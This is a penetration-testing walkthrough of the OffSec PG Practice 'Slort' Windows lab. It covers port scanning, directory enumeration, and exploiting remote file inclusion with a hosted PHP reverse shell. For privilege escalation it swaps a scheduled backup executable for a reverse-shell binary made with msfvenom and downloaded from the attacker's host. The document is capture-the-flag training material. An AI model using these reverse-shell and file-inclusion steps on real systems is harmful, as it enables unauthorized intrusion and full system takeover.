Slort Walkthrough
Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)
1. Scanning
─$ rustscan -a $IP -- -sV -sC -Pn
matrix(0.00634765 0 0 0.00634765 -1.26953 8.81689)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:4443/dashboard/
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:8080/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 47958/tcp): CLEAN (Couldn't connect)
| Check 2 (port 43822/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22925/udp): CLEAN (Timeout)
| Check 4 (port 13188/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 0s
| smb2-time:
| date: 2025-09-02T12:11:10
|_ start_date: N/A
2. Enumeartion
Enumerating FTP port 21
Starting with anonymous,admin login --> Failed
We have the version FileZilla ftpd 0.9.41 beta, Looked into searchsploit does not seem to be directly vulnerable. we can come back to this later.
Enumearting HTTP
Port 4443 Enumeartion
We'll enumearte web apps first there are generally high chances for vulnearbilities
On the first glance it is redirecting to the default page for XAMPP apache.
Can't access PHPmyadmin page.
While looking into the phpinfo page, we found a user rupert
Using Gobuster we found a site
Port 8080 Enumeartion
It also has the same page as 4443.. Strange
After digging little and using Gobuster found a Site
└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x txt,pdf,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.224.53:8080
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,pdf,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/img/]
/site (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/site/]
/examples (Status: 503) [Size: 1060]
/licenses (Status: 403) [Size: 1205]
/dashboard (Status: 301) [Size: 351] [--> http://192.168.224.53:8080/dashboard/]
/%20 (Status: 403) [Size: 1046]
/IMG (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/IMG/]
/Site (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/Site/]
Narrowed down to both the sites are same , Looks like it was hosted on 2 ports.
looking at the website http://192.168.224.53:4443/site/index.php?page=main.php we can test for file inclusion vulnearbility.
On initial testing I quickely found LFI
Let's test for RFI as well. So we'll use cp /usr/share/webshells/php/php-reverse-shell.php . and host on kali machine and try to access it through the website..
changing the required paremeters IP and port in the script
Hosting on kali machine
└─$ sudo python3 -m http.server 80
Opening a listner in kali machine
nc -nvlp 21
Successfully failed 😅, So We'll try a different reverse shell .
Initial access
After some failures I was able to find a PhpReverseShell.php and it worked.
Modify the necessary part after downloading the exploit.
Steps are to host this on your kali machine using command
└─$ sudo python3 -m http.server 80
Then call from the website, I have changed the name of the file as rev2.php.
and it get's downloaded from the system
And we get a quick shell from the windows machine
Privilege Escalation
Quickly run winpeas and started looking through the results,
This TFTP caught my attention.
Went into the backup folder and did some investigation
found that this exe runs every 5 minutes to take backup and I have full access over the EXE.
Let's try to replace it with a reverse shell and wait for it to execute.
Used msfvenom to generate malicous binary.
└─$ msfvenom --payload windows/x64/shell_reverse_tcp LHOST=192.168.45.174 LPORT=9000 -f exe > TFTP.EXE
And downloaded it in the folder
PS C:\Backup> iwr -uri http://192.168.45.174/TFTP.EXE -Outfile TFTP.EXE
it got executed and we got a shell as administrator.
